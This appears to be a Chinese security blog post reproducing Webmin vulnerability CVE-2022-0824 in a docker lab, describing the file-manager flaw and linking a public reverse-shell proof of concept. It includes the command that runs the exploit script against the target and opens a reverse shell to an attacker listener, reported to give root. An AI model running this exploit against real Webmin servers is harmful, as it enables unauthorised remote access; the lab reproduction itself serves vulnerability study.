查看原文
其他

Webmin 漏洞 CVE-2022-0824复现

WIN哥 WIN哥学安全 2023-04-23

WEBmin简介

Webmin 是一个基于 Web 的 Linux/Unix 系统管理软件。

简单地说,就是你可以打开一个浏览器,然后输入 Webmin 的管理地址,在打开的页面中就可以管理你的 Linux/Unix 系统了。

Webmin 功能强大,可以管理设置很多东西,比如用户帐户、Apache 服务、DNS 、文件共享等等,几乎所有的东西都能给你管上一管。

Webmin 是由一个简单的 Web 服务器和一些 CGI 程序组成的系统,Web 服务器和所有 CGI 程序都是使用 Perl 5,并且不使用非标准的 Perl 模块。

它通过管理相应的系统配置文件来实现管理目的,比如它直接通过访问编辑 /etc/passwd 来管理用户密码等等。

因此,我们可以借助 Webmin 来辅助我们学习配置 Linux 系统。

Webmin 官网首页

https://www.webmin.com/

目前最新的版本为2022年11月27日更新的Webmin 2.010



漏洞介绍

漏洞描述

在 Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行。

其他漏洞信息可以参考CVE,NVD,CNVD,CNNVD等漏洞库的披露。

漏洞编号

CVE编号:CVE-2022-0824

CNVD编号:CNVD-2022-17023

CNNVD编号::CNNVD-202203-076

危险等级:

该漏洞 CVSS:3.1评分为8.8 ,属于高危漏洞

影响版本:

Webmin Webmin < Webmin Webmin1.990    //1.990版本之前均受影响

环境搭建

webmin可以下载对应版本自行搭建,也可以直接拉取docker镜像,本次以docker镜像进行复现。

POC/EXP:已公开

POC地址

https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell

拉取漏洞镜像和访问

docker pull vulfocus/webmin_cve-2022-0824:latestdocker run -itd -p 10000:10000 -d vulfocus/webmin_cve-2022-0824
访问映射地址127.0.0.1:10000,root 密码: password登录


如上,漏洞环境搭建完毕。

漏洞复现

目标站点:http://127.0.0.1:10000 ,IP为192.168.171.132

攻击端:linux-kali ,IP为192.168.171.144

在攻击端监听端口4444:

将POC文件下载,并且执行利用脚本

python3 Webmin-revshell.py -t http://192.168.171.132:10000 -c root:password -LS 192.168.171.144:9090 -L 192.168.171.144 -P 4444

成功执行命令可以看到在监听端获取了root权限。


解决方案:

更新到最新版本 



您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存